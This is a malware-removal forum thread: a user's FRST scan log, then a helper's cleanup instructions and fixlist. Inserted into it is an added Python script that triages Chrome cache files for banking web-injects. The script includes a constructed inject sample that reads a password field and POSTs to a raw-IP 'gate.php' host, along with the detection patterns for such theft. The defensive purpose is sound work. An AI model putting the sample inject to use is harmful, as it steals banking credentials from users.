MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{FB26CA16-1F78-41D9-9212-EEB3CFC86A1A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{93ECF39C-5F31-4375-862D-347F65610B22}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{230E8410-C477-455D-A8C9-99CDFA60B6F2}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{0CEC2E1F-26F8-4203-B1EC-1BE123D86A6C}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{19E7DF6C-1229-43A1-9D98-022ACF1D7C51}] => (Allow) svchost.exe
FirewallRules: [TCP Query User{FC8CAE3A-1872-414D-8D94-755870FBF5BD}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [UDP Query User{125C4FF4-8DD7-4B9A-ADDF-01A77C431207}C:\program files (x86)\java\jre6\bin\java.exe] => (Allow) C:\program files (x86)\java\jre6\bin\java.exe
FirewallRules: [TCP Query User{CFC33FE1-2CB4-4695-9EE8-0930DB7ADC86}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{343787D2-B4A1-459D-87F5-FBBFA3D809DC}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{DA8BF005-AF20-4FE2-9183-D97B3E3FFF5D}] => (Allow) LPort=21677
FirewallRules: [{EAC16CCC-2F87-4F02-BB06-66DAA37F6F1A}] => (Allow) LPort=24515
FirewallRules: [{4A8A432D-C8B7-41A5-96B7-36056D113CFB}] => (Allow) LPort=21419
FirewallRules: [{51C46967-9BBA-4F62-8B0A-4CAEA9B197E0}] => (Allow) LPort=21885
FirewallRules: [TCP Query User{FB505404-64EF-4F0A-85BD-AD34A44A970D}D:\desktop\winbox.exe] => (Block) D:\desktop\winbox.exe
FirewallRules: [UDP Query User{943B8DC3-53A3-4DE1-94BA-E660403DFA0F}D:\desktop\winbox.exe] => (Block) D:\desktop\winbox.exe
FirewallRules: [{401B6B20-3872-4524-8566-2B28EF2A79B8}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{48325F77-213C-4F3F-A503-6E886394F1DB}] => (Allow) LPort=2869
FirewallRules: [{24D08F4D-2E31-4168-95E1-CF39050E541B}] => (Allow) LPort=1900
FirewallRules: [{032E027D-E459-4393-BCC6-6EF8C7767E1D}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{B3DB444C-E03B-43AA-9CDE-FDC735418E43}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{95D57C87-28BE-48FC-BBBF-512DAEFDD16E}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [{30D0CCB3-AA5E-4B32-8D6A-668BAD937C0E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{22EC6FEA-6523-4737-BD3F-2C88712B30F5}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\RM.exe
FirewallRules: [{FDE08989-26A5-435D-BB2A-9C19FAF126BE}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\RM.exe
FirewallRules: [{16B9920C-3A91-40DD-A191-5BF35E1C720C}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\Studio.exe
FirewallRules: [{593465EC-7CB0-4543-A318-FC89FC2BB27B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\Studio.exe
FirewallRules: [{513F68DE-38D3-48B4-8E4C-1B11F21A9000}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\umi.exe
FirewallRules: [{B1E06DBF-0407-4805-A470-6A3EC7D66D75}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 15\Programs\umi.exe
FirewallRules: [{F204C1CF-B8B9-4EBB-A817-B65EF9420657}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F3D3F6D8-DC0E-4C65-AB3A-3D4138BA6EA7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{CCB8C00E-3400-4E4B-BAE9-D2ACF81AA524}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Stronghold Kingdoms\StrongholdKingdoms.exe
FirewallRules: [{209F1A47-C9B4-466E-A13E-563912F9230E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Stronghold Kingdoms\StrongholdKingdoms.exe
FirewallRules: [TCP Query User{4D6E8E3A-FDCA-48A8-BC3F-2908B462FF5D}C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe
FirewallRules: [UDP Query User{A91D9646-D3FC-4DFC-99D0-8950236C5299}C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\happywars\happywars.exe
FirewallRules: [{DE5D1273-6F33-48D7-BFB3-03A508603C96}] => (Allow) C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{1A484A1A-D6C4-4AF8-8EC5-A81D2ECB7984}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{15FAD70B-33B2-4C4D-81EB-AB741FD73312}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{2F7D094B-B57A-4EB0-96F9-A4A275106C51}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{9BEB314F-7A25-4AC0-8559-400E018699BA}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{098B3942-9C93-4188-9B9C-5C30C6DB14C0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7D84F1DC-5988-4F91-99C0-DFDB035AB222}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7EB6698E-7416-4AFE-A3C4-E475D51544A4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{29925A91-0D2E-4FE2-944B-28FE0970FCC7}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{8EBFCEDF-7FE3-47A1-AC2C-F5B2EE71559D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{39C573C2-5BB3-4656-BA6F-906817966C28}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{B0329ACA-BCD0-42C8-8EFE-C51172773BB5}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{FBE310CA-2432-4CC9-A83A-ECFEBC19105D}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{78731FF2-A35C-453C-8D7D-253E173CB179}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E0D169D6-D3A5-4BFB-AF25-3786F605318E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{9AA165D6-722C-47CD-97C4-A5E7BAA65DFD}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [UDP Query User{4CAB4E4D-B0C2-4533-A3F6-32F8E6E9F269}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{BF4DFDD7-4557-4454-B569-192EAA368349}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{40AD4E61-C418-4BA1-9F62-E54C9C6629A9}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [TCP Query User{35946E8B-D3BB-4D90-A851-D04C3E872543}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{0FFC3247-D066-47DF-B90E-4864C143530D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{C3A88AD7-EA1E-447B-8873-4E1751AE378B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{1E136EAF-4F09-40D3-9334-1987280472D8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{4E936C24-638D-4541-8D2C-94498B48A7E6}] => (Allow) C:\Program Files\HP\HP LaserJet P1100 Series\wificonfig.exe
FirewallRules: [{ACD8FF8C-E49D-4EB4-B3C6-085157BF3A1C}] => (Allow) C:\Program Files\HP\HP LaserJet P1100 Series\wificonfig.exe
FirewallRules: [{C43776BE-3D9F-4396-998C-85F4E0E02445}] => (Allow) LPort=9100
FirewallRules: [{9DDB1785-7A3D-4935-A54D-C84277A3FE6B}] => (Allow) LPort=427
FirewallRules: [{2D4E2718-6D9E-48D7-9F89-4C531621F240}] => (Allow) LPort=161
FirewallRules: [{5C494057-FF77-4A85-AA09-6DCE55E14B34}] => (Allow) C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FC64DC36-0AF6-42A4-AC80-C5B36013455D}] => (Allow) C:\Users\Gianluca\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6C5D1D48-8B75-4C68-92C2-0077A022DD10}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{341ECBF2-5D74-4603-B92D-9BE72DA790D8}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{294275C0-248D-4447-895C-94F7E034A9B8}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{B40AB993-822E-4510-B494-50DCD7FD15A8}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [TCP Query User{E2C9AB04-B157-4426-A3BB-52A23BD43B3B}C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [UDP Query User{BC978ACA-F0AF-402E-99BC-A4F3D7EFDE28}C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{3081A5A7-2282-4BA3-90B8-CCF5A34B0273}] => (Block) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{B4100283-0191-4084-B7F5-A84FCD20E9D2}] => (Block) C:\program files (x86)\java\jre1.8.0_45\bin\jp2launcher.exe
FirewallRules: [{97C1CBCE-6D1F-4B02-B8A3-5977D7C55ED1}] => (Allow) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/12/2015 01:17:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 01:15:44 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error: 0x80070005.

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 492: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 11:04:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 11:02:29 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error: 0x80070005.

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 232: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)


System errors:
=============
Error: (08/10/2015 01:15:51 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (07/20/2015 06:41:36 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for the Avira Service Host service to connect.

Error: (07/18/2015 01:11:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for the Avira Service Host service to connect.

Error: (07/16/2015 10:08:27 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for the Avira Service Host service to connect.

Error: (07/15/2015 08:09:10 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for the Avira Service Host service to connect.

Error: (07/06/2015 08:53:57 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.

Error: (07/06/2015 08:47:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.

Error: (07/06/2015 08:45:13 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.

Error: (07/06/2015 08:08:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.

Error: (07/06/2015 07:59:23 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.


Microsoft Office:
=========================
Error: (08/12/2015 01:17:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 01:15:44 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: 0x800700050x00000000

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 12:01:43 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 492: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 11:04:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/12/2015 11:02:29 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: 0x800700050x00000000

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 468: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 320: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)

Error: (08/12/2015 02:07:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: 232: ERROR: read_msg errno 10054 (An existing connection was forcibly closed by the remote host.)


CodeIntegrity:
===================================
Date: 2015-05-07 11:59:44.365
Description: The image integrity of the file \Device\HarddiskVolume2\54665465465322111\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2015-05-07 11:59:44.350
Description: The image integrity of the file \Device\HarddiskVolume2\54665465465322111\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2015-05-07 10:48:03.545
Description: The image integrity of the file \Device\HarddiskVolume2\54665465465322111\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2015-05-07 10:48:03.545
Description: The image integrity of the file \Device\HarddiskVolume2\54665465465322111\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2014-11-16 10:43:10.918
Description: The image integrity of the file \Device\HarddiskVolume2\95175389624\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2014-11-16 10:43:10.902
Description: The image integrity of the file \Device\HarddiskVolume2\95175389624\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2013-09-17 11:59:20.573
Description: The image integrity of the file \Device\HarddiskVolume2\157944315879\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2013-09-17 11:59:20.573
Description: The image integrity of the file \Device\HarddiskVolume2\157944315879\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2012-02-10 21:23:23.085
Description: The image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.

Date: 2012-02-10 21:23:23.070
Description: The image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys could not be verified. The file hash could not be found on the system. Possible cause: a damaged or incorrectly signed file was installed by a hardware or software change, or malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 34%
Total physical RAM: 8168.94 MB
Available physical RAM: 5389.32 MB
Total Virtual: 21919.14 MB
Available Virtual: 18318.39 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:272.23 GB) (Free:104.61 GB) NTFS
Drive d: (Volume) (Fixed) (Total:659.18 GB) (Free:331.39 GB) NTFS
Drive f: (ACER) (Fixed) (Total:293.33 GB) (Free:59.47 GB) NTFS
Drive g: (DATA) (Fixed) (Total:293.08 GB) (Free:57.91 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 09436ECC)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=272.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=659.2 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 596.2 GB) (Disk ID: DDE426B1)
Partition 1: (Not Active) - (Size=9.8 GB) - (Type=27)
Partition 2: (Active) - (Size=293.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=293.1 GB) - (Type=07 NTFS)

==================== End of log ============================

Edited by Oh My!, 12 August 2015 - 04:48 PM.
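The path Avira reported in the first post sits under Chrome's cache, and f_0207ab is a cache data file rather than a download: the flagged script was something the browser fetched or received while the bank page loaded, and the detection alone does not say whether the server sent it or something on the machine injected it. One way to triage such a hit offline, as an added example that is not part of the original post and is not Avira's JS/Banker.BA signature: walk a Chrome blockfile cache directory (large bodies get their own f_ file, small ones are packed into the data_N block files), inflate bodies that were cached in gzip-encoded form, score each script body against web-inject traits (credential-field lookups, obfuscated eval, POSTs to raw-IP hosts) and hash every hit so it can be submitted for a second opinion. The indicator list, weights, threshold and the sample cache built in a temp directory are my own constructions.

```python
"""Triage a Chrome blockfile cache directory for cached scripts that look like
banking web-inject payloads. Added example, not from the thread and not Avira's
JS/Banker.BA signature: the indicators below are hand-written heuristics and
the sample cache is constructed in a temp directory."""
import gzip
import hashlib
import re
import tempfile
from pathlib import Path

# Weighted indicators (hypothetical weights, chosen for illustration only).
INDICATORS = [
    (re.compile(rb"eval\s*\(\s*(?:unescape|atob|String\.fromCharCode)", re.I), 3, "obfuscated eval"),
    (re.compile(rb"getElementsBy(?:Name|Id)\s*\(\s*['\"](?:password|passwd|pass|pin|otp)", re.I), 3, "credential field lookup"),
    (re.compile(rb"type\s*=\s*['\"]password['\"]", re.I), 2, "password input reference"),
    (re.compile(rb"XMLHttpRequest|\.open\s*\(\s*['\"]POST['\"]", re.I), 1, "outbound POST"),
    (re.compile(rb"https?://(?:\d{1,3}\.){3}\d{1,3}"), 2, "raw-IP URL"),
    (re.compile(rb"\b(?:botid|inject|grabber)\b", re.I), 2, "bot vocabulary"),
]
SCRIPT_HINT = re.compile(rb"function\s*\(|document\.|window\.")
THRESHOLD = 5  # flag a body once its weighted score reaches this value


def decode_body(raw: bytes) -> bytes:
    """Chrome caches the response body as received, so a gzip-encoded response
    is stored compressed; inflate it before matching, fall back to raw bytes."""
    if raw[:2] == b"\x1f\x8b":
        try:
            return gzip.decompress(raw)
        except (OSError, EOFError):
            return raw
    return raw


def score_blob(body: bytes):
    """Return (score, matched indicator labels) for one cached body.
    Bodies with no script-like content score 0 without further matching."""
    if not SCRIPT_HINT.search(body):
        return 0, []
    score, hits = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(body):
            score += weight
            hits.append(label)
    return score, hits


def scan_cache_dir(cache_dir) -> list:
    """Scan every f_* data file and data_N block file in a cache directory.
    Block files hold many small entries, so they are matched as raw bytes;
    the SHA-256 is taken over the file as stored, which is what you submit."""
    findings = []
    for p in sorted(Path(cache_dir).iterdir()):
        if not (p.name.startswith("f_") or p.name.startswith("data_")):
            continue
        raw = p.read_bytes()
        score, hits = score_blob(decode_body(raw))
        if score >= THRESHOLD:
            findings.append({"file": p.name, "score": score, "indicators": hits,
                             "sha256": hashlib.sha256(raw).hexdigest()})
    return findings


# Constructed sample bodies: a benign page script and an inject-style script
# that reads the password field, posts to a raw-IP host and unpacks itself.
BENIGN_JS = b"(function(){ window.app = { init: function(){ document.title = 'Home'; } }; })();"
INJECT_JS = (b"(function(){var f=document.getElementsByName('password')[0];"
             b"var x=new XMLHttpRequest();x.open('POST','http://203.0.113.7/gate.php');"
             b"eval(unescape('%61%6c%65%72%74'));})();")


def build_sample_cache() -> str:
    """Write a constructed cache directory: benign script, inject script in
    plain and gzip-encoded form, a PNG, and a block file with a harmless snippet."""
    d = tempfile.mkdtemp(prefix="chrome_cache_")
    Path(d, "f_000001").write_bytes(BENIGN_JS)
    Path(d, "f_000002").write_bytes(INJECT_JS)
    Path(d, "f_000003").write_bytes(gzip.compress(INJECT_JS))
    Path(d, "f_000004").write_bytes(b"\x89PNG\r\n\x1a\n" + bytes(range(64)))
    Path(d, "data_1").write_bytes(b"\x00" * 32 + BENIGN_JS + b"\x00" * 32)
    return d


if __name__ == "__main__":
    for f in scan_cache_dir(build_sample_cache()):
        print(f"{f['file']}: score {f['score']} {f['indicators']} sha256={f['sha256'][:16]}...")
```

Point it at a real profile's Cache directory with the browser closed; only the two inject bodies are flagged in the sample, and the plain and gzip-stored copies hash differently, which is why the hash of the file as stored is the one to compare against a quarantine entry.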


#2 Oh My! (Malware Response Instructor, "Adware and Spyware and Malware.....", 36,392 posts, Location: California)

Posted 12 August 2015 - 04:59 PM

Greetings GiakMind and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Reply to Topic button instead.
  • In the upper right hand corner of the topic you will see the Follow Topic button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Unfortunately there is evidence of pirated software on your computer. If you would like continued help I am going to ask you to remove Microsoft Office Professional 2010 and any other software for which you do not have a valid license. The presence of any pirated software is illegal and hampers our ability to clean your computer. If you are willing to do that let me know when you have completed that and we can continue on. If you prefer to not do that I will be closing the topic.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 GiakMind (Topic Starter, Members, 10 posts, Location: Roma, Italy)

Posted 12 August 2015 - 06:13 PM

I uninstalled that and other software, now I should be OK.

 

New logs in attachment below :)


#4 Oh My! (Malware Response Instructor, 36,392 posts, Location: California)

Posted 12 August 2015 - 06:52 PM

Thank you, let's start with this.

===================================================

P2P Warning

--------------------

Going over your logs I noticed that you have µTorrent installed. It is pretty much certain that if you continue to use P2P programs, you will get infected again.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
I would recommend that you uninstall µTorrent, however that choice is up to you. If you choose to remove the program, you can do so via Start > Control Panel > Add/Remove Programs.

If you are still leaning toward using this program, please take a look at this information about Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked, resulting in your IP address being monitored by copyright authorities.

If you wish to keep it, please do not use it until we are completely done and your machine is determined to be clean and updated.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows logo key + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
